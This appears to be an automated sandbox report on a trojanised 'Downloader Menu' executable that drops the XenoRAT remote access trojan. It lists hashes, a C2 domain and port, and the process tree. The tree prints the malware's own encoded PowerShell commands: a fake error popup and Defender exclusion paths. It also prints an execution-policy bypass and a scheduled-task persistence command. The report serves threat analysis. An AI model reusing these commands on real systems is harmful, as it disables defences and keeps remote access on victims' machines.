Analysis

  • max time kernel
    149s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    04-07-2024 17:08

General

  • Target

    DownlaoderMenu.exe

  • Size

    4.5MB

  • MD5

    ec79983fdb605310fac832ba5809e2d6

  • SHA1

    ca83d6453563e02decf614d0ce331de493267d2f

  • SHA256

    b67d8fc52334fb2309368bf2a738520f1b42436951b211b7896f612b86350c10

  • SHA512

    234bb8696c8a6929784165366dc4317d5826738711a7661bf26e4ffab8e958db23d0f2a11542b3f0b5c4c71d62d3e4bc7a730d94d917a21d132d40e2a67ed460

  • SSDEEP

    98304:ePj50PrsilC2IbhblAh5+dWspirADIsYAVjw1gI:i5gahZWs80sfsw1R

Malware Config

Extracted

Family

xenorat

C2

hax.onthewifi.com

Mutex

hAxxx

Attributes
  • delay

    5000

  • install_path

    appdata

  • port

    1960

  • startup_name

    Windows

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\DownlaoderMenu.exe
    "C:\Users\Admin\AppData\Local\Temp\DownlaoderMenu.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZgBiACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGgAcwBjACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBpAG4AZABvAHcAcwAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuACAAZQBuAGMAbwB1AG4AdABlAHIAZQBkACAAYQBuACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGUAcgByAG8AcgAuACAAVgBlAHIAaQBmAHkAIAB0AGgAYQB0ACAAdABoAGUAIABpAG4AcwB0AGEAbABsAGEAdABpAG8AbgAgAHMAbwB1AHIAYwBlAHMAIABhAHIAZQAgAGEAYwBjAGUAcwBpAGIAbABlACwAIABhAG4AZAAgAHIAZQBzAHQAYQByAHQAIAB0AGgAZQAgAGkAbgBzAHQAYQBsAGwAYQB0AGkAbwBuAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHgAZABtACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAawByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAcABwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBnACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
    • C:\Windows\Downloader_Menu_2.1.exe
      "C:\Windows\Downloader_Menu_2.1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Users\Admin\cvtres.exe
        C:\Users\Admin\cvtres.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\temp_.ps1"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:548
    • C:\Users\Admin\AppData\Roaming\risk.exe
      "C:\Users\Admin\AppData\Roaming\risk.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe
        "C:\Users\Admin\AppData\Roaming\XenoManager\risk.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /Create /TN "Windows" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2433.tmp" /F
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2860

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp2433.tmp
    Filesize

    1KB

    MD5

    c824a7486b8af655d347fd367022d0d2

    SHA1

    17bb7f077818e6d5ecb3be0fc681d341b82dd72b

    SHA256

    025ef7965c1b7643ff8d71a48c71d62ce4380e3ac6324ecf51f80717a4d61c14

    SHA512

    a026982ac700263bf2dfd5415365dbe52b0e59095adfd00c937af28f5c84978faf65aeb2cd2c7c9dc5c7b38dc82dc2acc2d7b91e96026e73a881483168586bc1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    289c368f56157adde3d7faadd51e1399

    SHA1

    ac24079cbc363b62621829f3edd6dda88ea3b165

    SHA256

    6dd83cf32503854c8ea75c983e1f052831e46838968a474e9e26efcf5e6f1803

    SHA512

    18796deb04cd0ca3296693e100304a8b7117cb77b863f31aa6ccedb12bdb3253355e39b3d4db616b61afe41b479c1625fc4e5f4abf98a5d172d86cee4885a584

  • C:\Users\Admin\AppData\Roaming\risk.exe
    Filesize

    45KB

    MD5

    2cb05f0d4360327b33956fedf516c6fe

    SHA1

    4562653b1361ce66ded9633e5883d00184c08796

    SHA256

    af82f7a1ca358d54f5da73409d05360c265f7569fb768218051c7ef2620e66e6

    SHA512

    f0967245d1693d74d146356c9540a9ae0b848a96a6e58eacc111a951a6b32e01f325f8848b2b0c66b38dbfcdcb37e052ccfc27cf9b3b6752f3cba876181f6fa6

  • C:\Users\Admin\temp.bat
    Filesize

    5.4MB

    MD5

    96b7afe999094957a1ce5b1c0ee0cb2f

    SHA1

    6b5d48b5f75246993de0263d27d2b9cdcc6ebf3f

    SHA256

    d22cb88bfae5285d86cb35c2acba863f85b2e63c241c1959d15ca3416bcb5e4a

    SHA512

    ed7e02b26664b442f95fdf83af03d7773c017dadf3bec8c2d37cc2b30c49b6751a3104b85f00cfedbd145f422635e5b3ad49ea80adf7c0a92b06db474c6a238c

  • C:\Users\Admin\temp.ps1
    Filesize

    1KB

    MD5

    5e817bbd9ef2f8821aa0283b20a51923

    SHA1

    102ca518d89653fb400636e660fa3fc276235c5c

    SHA256

    27f2822ca2be992ebb6e1000aa3a2c39e9b4ff7e257cb45eadda8776d65018a7

    SHA512

    f21388e0655e6733abc70ff9fe2bbfdca00d81d2e7a09236d679293df34a966990f689f2d62119cdd877c7aeda35ab0c2b3c66108bc6b721e5dea34a93342d2e

  • C:\Users\Admin\temp_.bat
    Filesize

    5.4MB

    MD5

    ff46d6b0970c55dba491b6dd06384f84

    SHA1

    c8be08575f2174a9a00bff33e3b1a7c1d9c4a025

    SHA256

    a5ad5faab69350449e8fd14adcb262ecb289696d5f0da374891e9eb226824c85

    SHA512

    b0d5b4eb5d9b58f35f218dffb43956716adb062626a75fcde11ba517e9d16d015f8a0d90ae72fbad47c87cbec86ef3e6a16347900f0c0be97e47f6d58bdac3a6

  • C:\Users\Admin\temp_.ps1
    Filesize

    1KB

    MD5

    5a0a8376c0e45cc25d4050920cee3dcc

    SHA1

    2de4ddf90f3165b245bd9f77c145c8f770c98b85

    SHA256

    86af1b7845145745ccaf65bf0dbeb1a981701ad0c6793c2dc93c0c2f2aef8d25

    SHA512

    f5afd39336d6b9f0590d68a716e8c3b403c13b98aae34d76f43e34698d2c6485e3dbce7a6439623362effec50ab0b2696b1ed25e377ba4dae75047ef419f51c0

  • C:\Windows\Downloader_Menu_2.1.exe
    Filesize

    4.4MB

    MD5

    9d3195f106a540570da0d038bc07cf68

    SHA1

    33c1dd7a4101d1622b4d9268da0b731e00ddca39

    SHA256

    240b3b43f49f5430d9d2e263e857d6e4c9c98af09fe8ae7d9c0e6b7c9eeacfce

    SHA512

    9c7b0da3e2a01a05f61e39648d31851c5b0d70d7f20d865792cf4c8cec39ad764b2f11833116dbcdea57f3ec1785345921defbd656eab4fc23095b63ba889f69

  • \Users\Admin\cvtres.exe
    Filesize

    5KB

    MD5

    c9698a20e68954387eed40d36d17c087

    SHA1

    c50cf0ac1cbf51a89b6c1b816e5e63e7e7287179

    SHA256

    3a71a978827979baeec7b94607e93a72cf2a51a7204a572f68a3788d83b87d8f

    SHA512

    f8099e4e6bf6e1cd850faa398b3ef8862852342bef0ec8a7318495be6e82ddf903834b951faa6c5bbd0879414dcaccf3fec6ade4ef74054e08011d718ed1e813

  • memory/548-48-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB

  • memory/548-47-0x000000001B830000-0x000000001BB12000-memory.dmp
    Filesize

    2.9MB

  • memory/1448-36-0x0000000000DC0000-0x0000000000DC8000-memory.dmp
    Filesize

    32KB

  • memory/2584-28-0x0000000000BE0000-0x0000000000BF2000-memory.dmp
    Filesize

    72KB

  • memory/2744-20-0x00000000000C0000-0x00000000000D2000-memory.dmp
    Filesize

    72KB